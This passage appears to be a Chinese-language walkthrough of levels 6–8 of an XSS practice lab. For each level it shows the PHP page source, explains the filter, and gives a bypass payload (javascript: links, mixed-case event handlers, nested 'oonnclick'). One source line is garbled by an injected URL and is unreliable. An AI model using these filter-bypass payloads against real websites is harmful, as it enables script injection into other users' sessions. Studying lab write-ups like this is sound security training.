strtolower()函数,把字符转换为小写,接着替换script标签和on使这个两个事件没法使用,但仍可以闭合引号,所以要使用其他标签通过javascript:alert('xss')来触发弹出
payload: "><a href=javascript:alert('xss') " "><a href=javascript:alert('xss') // 第六关 查看源码: <!DOCTYPE html> <head> <meta charset="utf-8"> <script> window.alert = function() { confirm("哎哟 不错哦!"); window.location.href="level7.php?keyword=持之以恒"; } </script> <title>第6关</title> </head> <body> <h1 align=center>第6关 嗯 还是搜索</h1> <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level6.php method=GET> <input name=keyword value="'.$str6.'"> <input type=submit name=submit value=搜索 /> </form> </center>'; ?> <center><img src="http://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg"></center> <?php echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>"; ?> </body> </html> 分析:
替换了script标签,on,src,data,herf,且html实体化看起来似乎没问题,但相比前几关发现没有转换为小写,所以可大小写来绕过匹配
payload: " ONclick=alert('XSS') // "><a Href=javascript:alert('XSS') // 第7关 查看源码: <!DOCTYPE html> <head> <meta charset="utf-8"> <script> window.alert = function() { confirm("哎哟 不错哦!"); window.location.href="level8.php?keyword=笨鸟先飞"; } </script> <title>第7关</title> </head> <body> <h1 align=center>第7关 猜一猜下面题目还有搜索嘛</h1> <?php ini_set("display_errors", 0); $str =strtolower( $_GET["keyword"]); $str2=str_replace("script","",$str); $str3=str_replace("on","",$str2); $str4=str_replace("src","",$str3); $str5=str_replace("data","",$str4); $str6=str_replace("href","",$str5); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level7.php method=GET> <input name=keyword value="'.$str6.'"> <input type=submit name=submit value=搜索 /> </form> </center>'; ?> <center><img src="http://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg"></center> <?php echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>"; ?> </body> </html> 分析:get方式传入keyword,strtolowe()函数变为小写,然后replace()函数匹配script,on,src,data,href,但是只是匹配了一次,所以可以嵌套绕过,最后htmlspecialchars(),所以< > 不能用,尝试闭合"
payload: " oonnclick=alert('XSS') // 第八关 查看源码: <!DOCTYPE html> <head> <meta charset="utf-8"> <script> window.alert = function() { confirm("哎哟 不错哦!"); window.location.href="level9.php?keyword=水滴石穿"; } </script> <title>第8关</title> </head> <body> <h1 align=center>第8关 老铁要和我换友链嘛?</h1> <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script","scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); $str7=str_replace('"','"',$str6); echo '<center> <form action=level8.php method=GET> <input name=keyword value="'.htmlspecialchars($str).'"> <input type=submit name=submit value=添加友情链接 /> </form> </center>'; ?> <?php echo '<center><BR><a href="'http://www.likecs.com/.$str7.'">友情链接</a></center>'; ?> <center><img src="http://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg"></center> <?php echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>"; ?> </body> </html> 分析: